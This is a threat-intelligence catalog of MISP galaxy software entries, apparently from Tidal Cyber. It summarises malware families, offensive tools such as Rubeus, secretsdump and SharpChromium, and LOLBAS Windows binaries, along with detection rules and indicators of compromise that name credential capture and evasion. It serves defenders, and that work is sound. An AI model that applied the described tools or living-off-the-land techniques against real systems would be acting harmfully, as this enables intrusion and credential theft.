[RotaJakiro](https://app.tidalcyber.com/software/169bfcf6-544c-5824-a7cd-2d5070304b57) is a 64-bit Linux backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First seen in 2018, it uses a plugin architecture to extend capabilities. [RotaJakiro](https://app.tidalcyber.com/software/169bfcf6-544c-5824-a7cd-2d5070304b57) can determine it’s permission level and execute according to access type (root or user).<sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[netlab360 rotajakiro vs oceanlotus](https://app.tidalcyber.com/references/20967c9b-5bb6-5cdd-9466-2c9efd9ab98c)]</sup>

The tag is: misp-galaxy:software="RotaJakiro"

route

[route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af) can be used to find or change information within the local system IP routing table. <sup>[[TechNet Route](https://app.tidalcyber.com/references/0e483ec8-af40-4139-9711-53b999e069ee)]</sup>

The tag is: misp-galaxy:software="route"

Rover

[Rover](https://app.tidalcyber.com/software/ef38ff3e-fa36-46f2-a720-3abaca167b04) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. <sup>[[Palo Alto Rover](https://app.tidalcyber.com/references/bbdf3f49-9875-4d41-986d-b693e82c77e1)]</sup>

The tag is: misp-galaxy:software="Rover"

Royal

[Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) has been used in attacks against multiple industries worldwide—​including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) and [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) attacks and noted a possible connection between their operators.<sup>[[Microsoft Royal ransomware November 2022](https://app.tidalcyber.com/references/91efc6bf-e15c-514a-96c1-e838268d222f)]</sup><sup>[[Cybereason Royal December 2022](https://app.tidalcyber.com/references/28aef64e-20d3-5227-a3c9-e657c6e2d07e)]</sup><sup>[[Kroll Royal Deep Dive February 2023](https://app.tidalcyber.com/references/dcdcc965-56d0-58e6-996b-d8bd40916745)]</sup><sup>[[Trend Micro Royal Linux ESXi February 2023](https://app.tidalcyber.com/references/e5bb846f-d11f-580c-b96a-9de4ba5eaed6)]</sup><sup>[[CISA Royal AA23-061A March 2023](https://app.tidalcyber.com/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]</sup>

The tag is: misp-galaxy:software="Royal"

Rpcping.exe - Associated Software

<sup>[[Rpcping.exe - LOLBAS Project](/references/dc15a187-4de7-422e-a507-223e89e317b1)]</sup>

The tag is: misp-galaxy:software="Rpcping.exe - Associated Software"

Rpcping

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to verify rpc connection

Author: Oddvar Moe

Paths: * C:\Windows\System32\rpcping.exe * C:\Windows\SysWOW64\rpcping.exe

Detection: * Sigma: [proc_creation_win_rpcping_credential_capture.yml]([Rpcping.exe - LOLBAS Project(/references/dc15a187-4de7-422e-a507-223e89e317b1)]</sup>

The tag is: misp-galaxy:software="Rpcping"

Rsockstun

Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse socks5 tunneler with SSL, ntlm, and proxy support.<sup>[[GitHub rsockstun](/references/1644457f-75d6-4064-a11b-9217249fa5e6)]</sup>

The tag is: misp-galaxy:software="Rsockstun"

Redaman - Associated Software

The tag is: misp-galaxy:software="Redaman - Associated Software"

RTM

[RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd)). Newer versions of the malware have been reported publicly as Redaman.<sup>[[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)]</sup><sup>[[Unit42 Redaman January 2019](https://app.tidalcyber.com/references/433cd55a-f912-4d5a-aff6-92133d08267b)]</sup>

The tag is: misp-galaxy:software="RTM"

Rubeus

[Rubeus](https://app.tidalcyber.com/software/2e54f40c-ab62-535e-bbab-3f3a835ff55a) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.<sup>[[GitHub Rubeus March 2023](https://app.tidalcyber.com/references/4bde7ce6-7fc6-5660-a8aa-745f19350ee1)]</sup><sup>[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]</sup><sup>[[DFIR Ryuk’s Return October 2020](https://app.tidalcyber.com/references/eba1dafb-ff62-4d34-b268-3b9ba6a7a822)]</sup><sup>[[DFIR Ryuk 2 Hour Speed Run November 2020](https://app.tidalcyber.com/references/3b904516-3b26-4caa-8814-6e69b76a7c8c)]</sup>

The tag is: misp-galaxy:software="Rubeus"

Ruler

[Ruler](https://app.tidalcyber.com/software/69563cbd-7dc1-4396-b576-d5886df11046) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://app.tidalcyber.com/software/69563cbd-7dc1-4396-b576-d5886df11046) have also released a defensive tool, NotRuler, to detect its usage.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup><sup>[[SensePost NotRuler](https://app.tidalcyber.com/references/1bafe35e-f99c-4aa9-8b2f-5a35970ec83b)]</sup>

The tag is: misp-galaxy:software="Ruler"

Rundll32.exe - Associated Software

<sup>[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]</sup>

The tag is: misp-galaxy:software="Rundll32.exe - Associated Software"

Rundll32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute dll files

Author: Oddvar Moe

Paths: * C:\Windows\System32\rundll32.exe * C:\Windows\SysWOW64\rundll32.exe

Detection: * Sigma: [net_connection_win_rundll32_net_connections.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml) * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Elastic: [defense_evasion_unusual_network_connection_via_rundll32.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml) * IOC: Outbount Internet/network connections made from rundll32 * IOC: Suspicious use of cmdline flags such as -sta<sup>[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]</sup>

The tag is: misp-galaxy:software="Rundll32"

Runexehelper.exe - Associated Software

<sup>[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]</sup>

The tag is: misp-galaxy:software="Runexehelper.exe - Associated Software"

Runexehelper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Launcher process

Author: Grzegorz Tworek

Paths: * c:\windows\system32\runexehelper.exe

Detection: * Sigma: [proc_creation_win_lolbin_runexehelper.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml) * IOC: c:\windows\system32\runexehelper.exe is run * IOC: Existence of runexewithargs_output.txt file<sup>[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]</sup>

The tag is: misp-galaxy:software="Runexehelper"

RunningRAT

[RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) and [Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0). <sup>[[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]</sup>

The tag is: misp-galaxy:software="RunningRAT"

Runonce.exe - Associated Software

<sup>[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]</sup>

The tag is: misp-galaxy:software="Runonce.exe - Associated Software"

Runonce

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Executes a Run Once Task that has been configured in the registry

Author: Oddvar Moe

Paths: * C:\Windows\System32\runonce.exe * C:\Windows\SysWOW64\runonce.exe

Detection: * Sigma: [registry_event_runonce_persistence.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml) * Sigma: [proc_creation_win_runonce_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml) * Elastic: [persistence_run_key_and_startup_broad.toml](https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml) * IOC: Registy key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY<sup>[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]</sup>

The tag is: misp-galaxy:software="Runonce"

Runscripthelper.exe - Associated Software

<sup>[[Runscripthelper.exe - LOLBAS Project](/references/6d7151e3-685a-4dc7-a44d-aefae4f3db6a)]</sup>

The tag is: misp-galaxy:software="Runscripthelper.exe - Associated Software"

Runscripthelper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Execute target PowerShell script

Author: Oddvar Moe

Paths: * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

The tag is: misp-galaxy:software="Runscripthelper"

Ryuk

[Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) shares code similarities with Hermes ransomware.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup><sup>[[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)]</sup><sup>[[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]</sup>

The tag is: misp-galaxy:software="Ryuk"

Saint Bot

[Saint Bot](https://app.tidalcyber.com/software/d66e5d18-e9f5-4091-bdf4-acdac129e2e0) is a .NET downloader that has been used by [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) since at least March 2021.<sup>[[Malwarebytes Saint Bot April 2021](https://app.tidalcyber.com/references/3a1faa47-7bd3-453f-9b7a-bb17efb8bb3c)]</sup><sup>[[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]</sup>

The tag is: misp-galaxy:software="Saint Bot"

Sakurel - Associated Software

The tag is: misp-galaxy:software="Sakurel - Associated Software"

VIPER - Associated Software

The tag is: misp-galaxy:software="VIPER - Associated Software"

Sakula

[Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. <sup>[[Dell Sakula](https://app.tidalcyber.com/references/e9a2ffd8-7aed-4343-8678-66fc3e758d19)]</sup>

The tag is: misp-galaxy:software="Sakula"

Samas - Associated Software

The tag is: misp-galaxy:software="Samas - Associated Software"

SamSam

[SamSam](https://app.tidalcyber.com/software/88831e9f-453e-466f-9510-9acaa1f20368) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.<sup>[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]</sup><sup>[[Talos SamSam Jan 2018](https://app.tidalcyber.com/references/0965bb64-be96-46b9-b60f-6829c43a661f)]</sup><sup>[[Sophos SamSam Apr 2018](https://app.tidalcyber.com/references/4da5e9c3-7205-4a6e-b147-be7c971380f0)]</sup><sup>[[Symantec SamSam Oct 2018](https://app.tidalcyber.com/references/c5022a91-bdf4-4187-9967-dfe6362219ea)]</sup>

The tag is: misp-galaxy:software="SamSam"

Sardonic

[Sardonic](https://app.tidalcyber.com/software/9ab0d523-3496-5e64-9ca1-bb756f5e64e0) is a backdoor written in C and C++ that is known to be used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f), as early as August 2021 to target a financial institution in the United States. [Sardonic](https://app.tidalcyber.com/software/9ab0d523-3496-5e64-9ca1-bb756f5e64e0) has a plugin system that can load specially made DLLs and execute their functions.<sup>[[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)]</sup><sup>[[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]</sup>

The tag is: misp-galaxy:software="Sardonic"

Sc.exe - Associated Software

<sup>[[Sc.exe - LOLBAS Project](/references/5ce3ef73-f789-4939-a60e-e0a373048bda)]</sup>

The tag is: misp-galaxy:software="Sc.exe - Associated Software"

Sc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to manage services

Author: Oddvar Moe

Paths: * C:\Windows\System32\sc.exe * C:\Windows\SysWOW64\sc.exe

The tag is: misp-galaxy:software="Sc"

schtasks.exe - Associated Software

The tag is: misp-galaxy:software="schtasks.exe - Associated Software"

schtasks

[schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. <sup>[[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]</sup>

The tag is: misp-galaxy:software="schtasks"

Scriptrunner.exe - Associated Software

<sup>[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]</sup>

The tag is: misp-galaxy:software="Scriptrunner.exe - Associated Software"

Scriptrunner

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Execute binary through proxy binary to evade defensive counter measures

Author: Oddvar Moe

Paths: * C:\Windows\System32\scriptrunner.exe * C:\Windows\SysWOW64\scriptrunner.exe

Detection: * Sigma: [proc_creation_win_servu_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml) * IOC: Scriptrunner.exe should not be in use unless App-v is deployed<sup>[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]</sup>

The tag is: misp-galaxy:software="Scriptrunner"

Scrobj.dll - Associated Software

<sup>[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]</sup>

The tag is: misp-galaxy:software="Scrobj.dll - Associated Software"

Scrobj

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Script Component Runtime

Author: Eral4m

Paths: * c:\windows\system32\scrobj.dll * c:\windows\syswow64\scrobj.dll

Detection: * IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line<sup>[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]</sup>

The tag is: misp-galaxy:software="Scrobj"

SDBbot

[SDBbot](https://app.tidalcyber.com/software/046bbd0c-bff5-46fc-9028-cbe46a9f8ec5) is a backdoor with installer and loader components that has been used by [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) since at least 2019.<sup>[[Proofpoint TA505 October 2019](https://app.tidalcyber.com/references/711ea2b3-58e2-4b38-aa71-877029c12e64)]</sup><sup>[[IBM TA505 April 2020](https://app.tidalcyber.com/references/bcef8bf8-5fc2-4921-b920-74ef893b8a27)]</sup>

The tag is: misp-galaxy:software="SDBbot"

SDelete

[SDelete](https://app.tidalcyber.com/software/3d4be65d-231b-44bb-8d12-5038a3d48bae) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. <sup>[[Microsoft SDelete July 2016](https://app.tidalcyber.com/references/356c7d49-5abc-4566-9657-5ce58cf7be67)]</sup>

The tag is: misp-galaxy:software="SDelete"

SeaDaddy - Associated Software

The tag is: misp-galaxy:software="SeaDaddy - Associated Software"

SeaDesk - Associated Software

The tag is: misp-galaxy:software="SeaDesk - Associated Software"

SeaDuke

[SeaDuke](https://app.tidalcyber.com/software/ae30d58e-21c5-41a4-9ebb-081dc1f26863) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a). <sup>[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]</sup>

The tag is: misp-galaxy:software="SeaDuke"

Seasalt

The tag is: misp-galaxy:software="Seasalt"

SEASHARPEE

The tag is: misp-galaxy:software="SEASHARPEE"

Seatbelt

Seatbelt is a tool used to perform numerous security-oriented checks.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Seatbelt"

secretsdump.py - Associated Software

The tag is: misp-galaxy:software="secretsdump.py - Associated Software"

secretsdump

According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script "used to extract credentials and other confidential information from a system".<sup>[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]</sup> Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.<sup>[[GitHub secretsdump](/references/c29a90a7-016f-49b7-a970-334290964f19)]</sup>

The tag is: misp-galaxy:software="secretsdump"

ServHelper

[ServHelper](https://app.tidalcyber.com/software/704ed49d-103c-4b33-b85c-73670cc1d719) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.<sup>[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]</sup>

The tag is: misp-galaxy:software="ServHelper"

Seth-Locker

[Seth-Locker](https://app.tidalcyber.com/software/fb47c051-d22b-4a05-94a7-cf979419b60a) is a ransomware with some remote control capabilities that has been in use since at least 2021. <sup>[[Trend Micro Ransomware February 2021](https://app.tidalcyber.com/references/64a86a3f-0160-4766-9ac1-7d287eb2c323)]</sup>

The tag is: misp-galaxy:software="Seth-Locker"

Setres.exe - Associated Software

<sup>[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]</sup>

The tag is: misp-galaxy:software="Setres.exe - Associated Software"

Setres

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Configures display settings

Author: Grzegorz Tworek

Paths: * c:\windows\system32\setres.exe

Detection: * Sigma: [proc_creation_win_lolbin_setres.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml) * IOC: Unusual location for choice.exe file * IOC: Process created from choice.com binary * IOC: Existence of choice.cmd file<sup>[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]</sup>

The tag is: misp-galaxy:software="Setres"

SettingSyncHost.exe - Associated Software

<sup>[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]</sup>

The tag is: misp-galaxy:software="SettingSyncHost.exe - Associated Software"

SettingSyncHost

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Host Process for Setting Synchronization

Author: Elliot Killick

Paths: * C:\Windows\System32\SettingSyncHost.exe * C:\Windows\SysWOW64\SettingSyncHost.exe

Detection: * Sigma: [proc_creation_win_lolbin_settingsynchost.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml) * IOC: SettingSyncHost.exe should not be run on a normal workstation<sup>[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]</sup>

The tag is: misp-galaxy:software="SettingSyncHost"

Setupapi.dll - Associated Software

<sup>[[Setupapi.dll - LOLBAS Project](/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]</sup>

The tag is: misp-galaxy:software="Setupapi.dll - Associated Software"

Setupapi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Setup Application Programming Interface

Author: LOLBAS Team

Paths: * c:\windows\system32\setupapi.dll * c:\windows\syswow64\setupapi.dll

Detection: * Sigma: [proc_creation_win_rundll32_setupapi_installhinfsection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml) * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Splunk: [detect_rundll32_application_control_bypass_setupapi.yml]([Setupapi.dll - LOLBAS Project(/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]</sup>

The tag is: misp-galaxy:software="Setupapi"

POISONPLUG.SHADOW - Associated Software

The tag is: misp-galaxy:software="POISONPLUG.SHADOW - Associated Software"

ShadowPad

[ShadowPad](https://app.tidalcyber.com/software/5190f50d-7e54-410a-9961-79ab751ddbab) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), but has since been observed to be used by various Chinese threat activity groups. <sup>[[Recorded Future RedEcho Feb 2021](https://app.tidalcyber.com/references/6da7eb8a-aab4-41ea-a0b7-5313d88cbe91)]</sup><sup>[[Securelist ShadowPad Aug 2017](https://app.tidalcyber.com/references/862877d7-e18c-4613-bdad-0700bf3d45ae)]</sup><sup>[[Kaspersky ShadowPad Aug 2017](https://app.tidalcyber.com/references/95c9a28d-6056-4f87-9a46-9491318889e2)]</sup>

The tag is: misp-galaxy:software="ShadowPad"

Disttrack - Associated Software

The tag is: misp-galaxy:software="Disttrack - Associated Software"

Shamoon

[Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) has also been seen leveraging [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.<sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup><sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup>

The tag is: misp-galaxy:software="Shamoon"

Shark

[Shark](https://app.tidalcyber.com/software/278da5e8-4d4c-4c45-ad72-8f078872fb4a) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd); it has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least July 2021.<sup>[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]</sup><sup>[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]</sup>

The tag is: misp-galaxy:software="Shark"

SharpChromium

SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a ".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins."<sup>[[GitHub SharpChromium](/references/ca1956a5-72f2-43ad-a17f-a52ca97bd84e)]</sup>

The tag is: misp-galaxy:software="SharpChromium"

SharpDisco

[SharpDisco](https://app.tidalcyber.com/software/4ed1e83b-a208-5518-bed2-d07c1b289da2) is a dropper developed in C# that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2020 to load malicious plugins.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:software="SharpDisco"

SharpRoast

SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.<sup>[[GitHub SharpRoast](/references/43a2e05d-4662-4a5c-9c99-3165f0d71169)]</sup>

The tag is: misp-galaxy:software="SharpRoast"

SharpShares

SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="SharpShares"

SharpStage

[SharpStage](https://app.tidalcyber.com/software/564643fd-7113-490e-9f6a-f0cc3f0e1a4c) is a .NET malware with backdoor capabilities.<sup>[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]</sup><sup>[[BleepingComputer Molerats Dec 2020](https://app.tidalcyber.com/references/307108c8-9c72-4f31-925b-0b9bd4b31e7b)]</sup>

The tag is: misp-galaxy:software="SharpStage"

SHARPSTATS

The tag is: misp-galaxy:software="SHARPSTATS"

Shdocvw.dll - Associated Software

<sup>[[Shdocvw.dll - LOLBAS Project](/references/0739d5fe-b460-4ed4-be75-cff422643a32)]</sup>

The tag is: misp-galaxy:software="Shdocvw.dll - Associated Software"

Shell32.dll - Associated Software

